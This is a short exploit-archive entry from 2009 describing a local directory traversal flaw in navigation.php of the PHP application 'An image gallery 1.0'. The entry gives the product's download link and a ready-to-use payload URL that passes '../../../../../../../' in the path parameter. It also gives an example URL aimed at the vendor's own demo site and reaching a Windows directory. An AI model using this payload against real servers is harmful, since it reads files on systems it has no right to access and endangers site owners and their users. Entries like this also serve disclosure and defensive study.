id: 5755
date: 09/09/2009
title: An image gallery 1.0 (navigation.php) Local Directory Traversal Vuln
author: ThE g0bL!N
cves: 

====================================================================
An image gallery 1.0 (navigation.php) Local Directory Traversal Vuln
====================================================================


-------------------------------------------------------------------------
An image gallery 1.0(navigation.php) Local Directory Traversal
-------------------------------------------------------------------------
# Author  : ThE g0bL!N
# Download  : http://www.plohni.com/wb/content/php/download/An_image_gallery_1-0.zip
# Note: Algerie 1 - 0 Zambie
============================================
# Exploit  :
-----------
 http://localhost/PATH/navigation.php?path=../../../../../../../
#ex   :
-------
http://www.plohni.com/wb/content/php/demos/An_image_gallery/navigation.php?path=../../../../../../../windows/
============================================



#  0day.today [2023-03-23]  #